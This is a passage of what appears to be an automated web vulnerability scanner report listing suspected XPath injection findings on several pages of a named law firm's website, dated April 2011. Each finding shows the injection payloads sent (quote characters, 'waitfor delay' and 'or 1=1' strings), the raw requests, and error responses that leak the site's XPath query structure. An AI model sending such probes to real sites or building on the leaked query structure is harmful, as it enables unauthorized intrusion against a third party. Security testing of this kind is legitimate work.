2.4. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client_Service/Overview/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /AboutUs/Online_Client_Service'/Overview/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:41 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.5. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client_Service/Overview/

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /AboutUs/Online_Client_Service/Overview'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:46 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6763
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='aboutus/online_client_service/overview'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>

...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/online_client_service/overview'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/online_client_service/overview'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.6. http://www.hoganlovells.com/aboutus/history/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /aboutus/history/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /aboutus'/history/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:16 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.7. http://www.hoganlovells.com/aboutus/history/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /aboutus/history/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /aboutus/history')waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:22 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6653
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='aboutus/history')waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family:"
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/history')waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/history')waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.8. http://www.hoganlovells.com/aboutus/overview/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /aboutus/overview/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /aboutus'/overview/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:56 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.9. http://www.hoganlovells.com/aboutus/overview/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /aboutus/overview/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /aboutus/overview'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:22:02 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6653
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='aboutus/overview'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family:"
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/overview'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/overview'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.10. http://www.hoganlovells.com/newsmedia/awardsrankings [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia')waitfor%20delay'0%3a0%3a20'--/awardsrankings HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:06 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6698
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia')waitfor%20delay'0:0:20'--/awardsrankings']' has an invalid token.</title>
<style>
body {font
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia')waitfor%20delay'0:0:20'--/awardsrankings']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia')waitfor%20delay'0:0:20'--/awardsrankings']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.11. http://www.hoganlovells.com/newsmedia/awardsrankings [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/awardsrankings' HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:11 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.12. http://www.hoganlovells.com/newsmedia/awardsrankings/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 92224765'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia92224765'%20or%201%3d1--%20/awardsrankings/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:06 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8180
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia92224765'%20or%201=1--%20/awardsrankings']' has an invalid token.</title>
<style>
body {font-f
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia92224765'%20or%201=1--%20/awardsrankings']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia92224765'%20or%201=1--%20/awardsrankings']' has an invalid token.]
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5070035
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.XPathParser.ParseFilterExpr(AstNode qyInput) +19
MS.Inter
...[SNIP]...

2.13. http://www.hoganlovells.com/newsmedia/awardsrankings/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/awardsrankings'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:16 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6693
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/awardsrankings'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/awardsrankings'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/awardsrankings'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.14. http://www.hoganlovells.com/newsmedia/fastfacts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/fastfacts/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'/fastfacts/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:56:15 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.15. http://www.hoganlovells.com/newsmedia/fastfacts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/fastfacts/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload '%20and%201%3d1--%20 was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/fastfacts'%20and%201%3d1--%20/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:56:18 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8120
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/fastfacts'%20and%201=1--%20']' has an invalid token.</title>
<style>
body {font-family:"Verda
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/fastfacts'%20and%201=1--%20']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/fastfacts'%20and%201=1--%20']' has an invalid token.]
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5070035
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.XPathParser.ParseFilterExpr(AstNode qyInput) +19
MS.Inter
...[SNIP]...

2.16. http://www.hoganlovells.com/newsmedia/newspubs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'waitfor%20delay'0%3a0%3a20'--/newspubs HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:06:01 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6663
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.</title>
<style>
body {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.17. http://www.hoganlovells.com/newsmedia/newspubs [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/newspubs%2527 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:06:29 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.18. http://www.hoganlovells.com/newsmedia/newspubs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'waitfor%20delay'0%3a0%3a20'--/newspubs/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:40 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6663
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.</title>
<style>
body {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

